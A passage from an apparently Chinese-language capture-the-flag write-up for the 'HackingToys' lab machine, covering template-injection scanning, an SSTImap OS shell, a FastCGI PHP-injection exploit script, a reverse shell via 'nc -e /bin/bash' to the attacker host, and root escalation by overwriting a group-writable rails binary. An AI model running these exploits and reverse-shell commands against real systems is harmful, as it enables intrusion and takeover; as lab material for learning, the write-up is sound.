2024-09-06_22-50-34\n\nAnalyzing URL(1\/1): https:\/\/192.168.10.101:3000\/search?query=121&amp;message=Product+does+not+exist\n===============================================================\nStatus code 200\nAnalyzing query parameter  message  =&gt;  [Product does not exist]\n[*] Value  O4MQGSCJNBYDUYO4  of query parameter  message  is being reflected 1 time(s) in the response body\n\n[!] The polyglot &lt;%&#039;${{\/#{@}}%&gt;{{ triggered an error: Status Code 500\n[*] The polyglot p &quot;&gt;[[${{1}}]] returned the response(s) [unmodified]\n[!] The polyglot &lt;%=1%&gt;@*#{1} was rendered in a modified way: [1@*#{1}]\n[*] The polyglot &lt;%=1%&gt;@*#{1} returned the response(s) [1@*#{1}]\n[*] The polyglot {##}\/*{{.}}*\/ returned the response(s) [unmodified]\n\nA template injection was detected and the template engine is now being identified.\n[*] The polyglot &lt;% returned the response(s) [empty]\n[+] A template engine was detected, but could not be identified (certainty: Low)\n\nAnalyzing query parameter  query  =&gt;  [121]\nNo errors are thrown and input is not being reflected.\nNo template engine could be detected\n\n===============================================================\n\nSuccessfully finished the scan\n[+] Suspected template injections: 1\n[+] 0 Very High, 0 High, 0 Medium, 1 Low, 0 Very Low certainty\n\nDuration: 634.186726ms\nAverage polyglots sent per user input: 3<\/code><\/pre>\n<p>\u770b\u4e0a\u53bb\u4e0d\u592a\u9614\u4ee5\u54e6\uff0c\u6362\u4e00\u4e2a\u5de5\u5177\uff1a<\/p>\n<pre><code class=\"language-bash\"># cd \/\n# git clone https:\/\/github.com\/vladko312\/SSTImap.git\n# cd SSTImap\n# pip install -r requirements.txt --no-warn-script-location\n# sudo ln -s \/home\/kali\/SSTImap\/sstimap.py \/usr\/sbin\/sstimap\nsstimap -u &quot;https:\/\/192.168.10.101:3000\/search?query=aaaaa&amp;message=Product+does+not+exist&quot;<\/code><\/pre>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202409071157965.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202409071157965.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240907110119451\" style=\"zoom:50%;\" \/><\/div><\/p>\n<pre><code class=\"language-bash\">sstimap -u &quot;https:\/\/192.168.10.101:3000\/search?query=aaaaa&amp;message=Product+does+not+exist&quot; --os-shell<\/code><\/pre>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202409071157966.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202409071157966.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240907110341400\" style=\"zoom:50%;\" \/><\/div><\/p>\n<h2>\u63d0\u6743<\/h2>\n<h3>\u4fe1\u606f\u641c\u96c6<\/h3>\n<pre><code class=\"language-bash\">(remote) lidia@hacktoys:\/home\/lidia\/.local$ cat start_rails.sh \n#!\/bin\/bash\n\nsource \/etc\/profile.d\/rvm.sh\ncd \/opt\/app\/gadgets\/\nrake db:drop\nrake db:create\nrake db:migrate\nrails db:seed\nexec \/usr\/local\/rvm\/gems\/ruby-3.1.0\/bin\/rails server -b &#039;ssl:\/\/0.0.0.0:3000?key=\/opt\/app\/gadgets\/certs\/server.key&amp;cert=\/opt\/app\/gadgets\/certs\/server.crt&#039;\n\n(remote) lidia@hacktoys:\/home\/lidia\/.local$ ls -la \/usr\/local\/rvm\/gems\/ruby-3.1.0\/bin\/rails\n-rwxrwxr-x 1 root rvm 566 May 20 13:51 \/usr\/local\/rvm\/gems\/ruby-3.1.0\/bin\/rails\n(remote) lidia@hacktoys:\/home\/lidia\/.local$ find \/ -perm -u=s -type f 2&gt;\/dev\/null\n\/usr\/bin\/passwd\n\/usr\/bin\/su\n\/usr\/bin\/chsh\n\/usr\/bin\/chfn\n\/usr\/bin\/gpasswd\n\/usr\/bin\/umount\n\/usr\/bin\/sudo\n\/usr\/bin\/newgrp\n\/usr\/bin\/mount\n\/usr\/lib\/openssh\/ssh-keysign\n\/usr\/lib\/dbus-1.0\/dbus-daemon-launch-helper\n(remote) lidia@hacktoys:\/home\/lidia\/.local$ \/usr\/sbin\/getcap -r \/ 2&gt;\/dev\/null\n\/usr\/bin\/ping cap_net_raw=ep\n(remote) lidia@hacktoys:\/home\/lidia\/.local$ ss -tnlup\nNetid           State            Recv-Q           Send-Q                       Local Address:Port                       Peer Address:Port           Process                                  \nudp             UNCONN           0                0                                  0.0.0.0:68                              0.0.0.0:*                                                       \ntcp             LISTEN           0                511                              127.0.0.1:80                              0.0.0.0:*                                                       \ntcp             LISTEN           0                1024                               0.0.0.0:3000                            0.0.0.0:*               users:((&quot;ruby&quot;,pid=506,fd=7))           \ntcp             LISTEN           0                128                                0.0.0.0:22                              0.0.0.0:*                                                       \ntcp             LISTEN           0                4096                             127.0.0.1:9000                            0.0.0.0:*                                                       \ntcp             LISTEN           0                128                                   [::]:22                                 [::]:*<\/code><\/pre>\n<h3>9000 \u7aef\u53e3<\/h3>\n<p>\u8f6c\u53d1\u4e00\u4e0b80\u7aef\u53e3\uff1a<\/p>\n<pre><code class=\"language-bash\">(remote) lidia@hacktoys:\/tmp$ .\/socat TCP-LISTEN:8080,fork TCP4:127.0.0.1:80&amp;\n[1] 1314\n(remote) lidia@hacktoys:\/tmp$ .\/socat TCP-LISTEN:9001,fork TCP4:127.0.0.1:9000&amp;\n[2] 1318<\/code><\/pre>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202409071157967.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202409071157967.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240907112800925\" style=\"zoom:50%;\" \/><\/div><\/p>\n<p>\u8bbf\u95ee\u4e00\u4e0b\uff1a<\/p>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202409071157968.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202409071157968.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240907112826617\" style=\"zoom:50%;\" \/><\/div><\/p>\n<p>\u5c1d\u8bd5\u6d4b\u8bd5\uff1a\u53c2\u8003 <a href=\"https:\/\/book.hacktricks.xyz\/network-services-pentesting\/9000-pentesting-fastcgi\">https:\/\/book.hacktricks.xyz\/network-services-pentesting\/9000-pentesting-fastcgi<\/a> <\/p>\n<pre><code class=\"language-bash\">#!\/bin\/bash\n\nPAYLOAD=&quot;&lt;?php echo &#039;&lt;!--&#039;; system(&#039;whoami&#039;); echo &#039;--&gt;&#039;;&quot;\nFILENAMES=&quot;\/var\/www\/html\/index.php&quot; # Exisiting file path\n\nHOST=$1\nB64=$(echo &quot;$PAYLOAD&quot;|base64)\n\nfor FN in $FILENAMES; do\n    OUTPUT=$(mktemp)\n    env -i \\\n      PHP_VALUE=&quot;allow_url_include=1&quot;$&#039;\\n&#039;&quot;allow_url_fopen=1&quot;$&#039;\\n&#039;&quot;auto_prepend_file=&#039;data:\/\/text\/plain\\;base64,$B64&#039;&quot; \\\n      SCRIPT_FILENAME=$FN SCRIPT_NAME=$FN REQUEST_METHOD=POST \\\n      cgi-fcgi -bind -connect $HOST:9001 &amp;&gt; $OUTPUT\n\n    cat $OUTPUT\ndone<\/code><\/pre>\n<p>\u5c1d\u8bd5\u4fee\u6539\u6307\u4ee4\uff0c\u770b\u770b\u80fd\u4e0d\u80fd\u6267\u884c\uff1a<\/p>\n<pre><code class=\"language-bash\"># \u547d\u4ee4\u6539\u4e3a id\n\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/HackingToys]\n\u2514\u2500$ .\/exp.sh 192.168.10.101\nContent-type: text\/html; charset=UTF-8\n\n&lt;!--dodi\nuid=1001(dodi) gid=1001(dodi) groups=1001(dodi),100(users)\n--&gt;\n..........<\/code><\/pre>\n<p>\u53d1\u73b0\u662f\u53ef\u4ee5\u7684\uff0c\u5c1d\u8bd5\u53cd\u5f39shell\uff01<\/p>\n<pre><code class=\"language-bash\">\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/HackingToys]\n\u2514\u2500$ head -n 10 exp.sh                                                               \n#!\/bin\/bash\n\nPAYLOAD=&quot;&lt;?php echo &#039;&lt;!--&#039;; system(&#039;nc -e \/bin\/bash 192.168.10.102 2345&#039;); echo &#039;--&gt;&#039;;&quot;\nFILENAMES=&quot;\/var\/www\/html\/index.php&quot; # Exisiting file path\n\nHOST=$1\nB64=$(echo &quot;$PAYLOAD&quot;|base64)\n\nfor FN in $FILENAMES; do\n    OUTPUT=$(mktemp)<\/code><\/pre>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202409071157969.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202409071157969.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240907114102351\" style=\"zoom:50%;\" \/><\/div><\/p>\n<h3>\u63d0\u6743 root<\/h3>\n<pre><code class=\"language-bash\">(remote) dodi@hacktoys:\/home\/dodi$ sudo -l\nMatching Defaults entries for dodi on hacktoys:\n    env_reset, mail_badpass, secure_path=\/usr\/local\/sbin\\:\/usr\/local\/bin\\:\/usr\/sbin\\:\/usr\/bin\\:\/sbin\\:\/bin, use_pty\n\nUser dodi may run the following commands on hacktoys:\n    (ALL : ALL) NOPASSWD: \/usr\/local\/bin\/rvm_rails.sh\n(remote) dodi@hacktoys:\/home\/dodi$ cat \/usr\/local\/bin\/rvm_rails.sh\n#!\/bin\/bash\nexport rvm_prefix=\/usr\/local\nexport MY_RUBY_HOME=\/usr\/local\/rvm\/rubies\/ruby-3.1.0\nexport RUBY_VERSION=ruby-3.1.0\nexport rvm_version=1.29.12\nexport rvm_bin_path=\/usr\/local\/rvm\/bin\nexport GEM_PATH=\/usr\/local\/rvm\/gems\/ruby-3.1.0:\/usr\/local\/rvm\/gems\/ruby-3.1.0@global\nexport GEM_HOME=\/usr\/local\/rvm\/gems\/ruby-3.1.0\nexport PATH=\/usr\/local\/rvm\/gems\/ruby-3.1.0\/bin:\/usr\/local\/rvm\/gems\/ruby-3.1.0@global\/bin:\/usr\/local\/rvm\/rubies\/ruby-3.1.0\/bin:\/usr\/local\/bin:\/usr\/bin:\/bin:\/usr\/local\/games:\/usr\/games:\/usr\/local\/rvm\/bin\nexport IRBRC=\/usr\/local\/rvm\/rubies\/ruby-3.1.0\/.irbrc\nexport rvm_path=\/usr\/local\/rvm\nexec \/usr\/local\/rvm\/gems\/ruby-3.1.0\/bin\/rails &quot;$@&quot;\n(remote) dodi@hacktoys:\/home\/dodi$ ls -la \/usr\/local\/rvm\/gems\/ruby-3.1.0\/bin\/rails\n-rwxrwxr-x 1 root rvm 566 May 20 13:51 \/usr\/local\/rvm\/gems\/ruby-3.1.0\/bin\/rails\n(remote) dodi@hacktoys:\/home\/dodi$ cat \/etc\/group | grep rvm\nrvm:x:1002:lidia,root<\/code><\/pre>\n<p>\u53d1\u73b0\u524d\u9762\u4e00\u4e2a\u7528\u6237\u53ef\u4ee5\u4fee\u6539\u6267\u884c\u6587\u4ef6\uff0c\u5c1d\u8bd5\u4fee\u6539\u8fdb\u884c\u6267\u884cshell\uff1a<a href=\"https:\/\/gtfobins.github.io\/gtfobins\/ruby\/#shell\">https:\/\/gtfobins.github.io\/gtfobins\/ruby\/#shell<\/a><\/p>\n<pre><code class=\"language-bash\">(remote) lidia@hacktoys:\/opt\/app\/gadgets$ echo &#039;\/bin\/bash&#039; &gt; \/usr\/local\/rvm\/gems\/ruby-3.1.0\/bin\/rails<\/code><\/pre>\n<p>\u5c1d\u8bd5\u6267\u884c\uff1a<\/p>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202409071157970.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202409071157970.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240907115435867\" style=\"zoom:50%;\" \/><\/div><\/p>\n<p>\u5f97\u5230root\u3002<\/p>\n<h2>\u53c2\u8003<\/h2>\n<p><a href=\"https:\/\/www.youtube.com\/watch?v=TpriR9yuJKU\">https:\/\/www.youtube.com\/watch?v=TpriR9yuJKU<\/a><\/p>\n<p><a href=\"https:\/\/www.bilibili.com\/video\/BV1nzHdegEfh\/?spm_id_from=333.999.0.0&amp;vd_source=8981ead94b755f367ac539f6ccd37f77\">https:\/\/www.bilibili.com\/video\/BV1nzHdegEfh\/?spm_id_from=333.999.0.0&vd_source=8981ead94b755f367ac539f6ccd37f77<\/a><\/p>\n","protected":false},"excerpt":{"rendered":"<p>HackingToys \u4fe1\u606f\u641c\u96c6 \u7aef\u53e3\u626b\u63cf \u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/HackingToy [&hellip;]<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[11,18],"tags":[],"class_list":["post-797","post","type-post","status-publish","format-standard","hentry","category-ctf-and-protest","category-web"],"_links":{"self":[{"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/posts\/797","targetHints":{"allow":["GET"]}}],"collection":[{"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/comments?post=797"}],"version-history":[{"count":1,"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/posts\/797\/revisions"}],"predecessor-version":[{"id":798,"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/posts\/797\/revisions\/798"}],"wp:attachment":[{"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/media?parent=797"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/categories?post=797"},{"taxonomy":"post_tag","embeddable":true,"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/tags?post=797"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}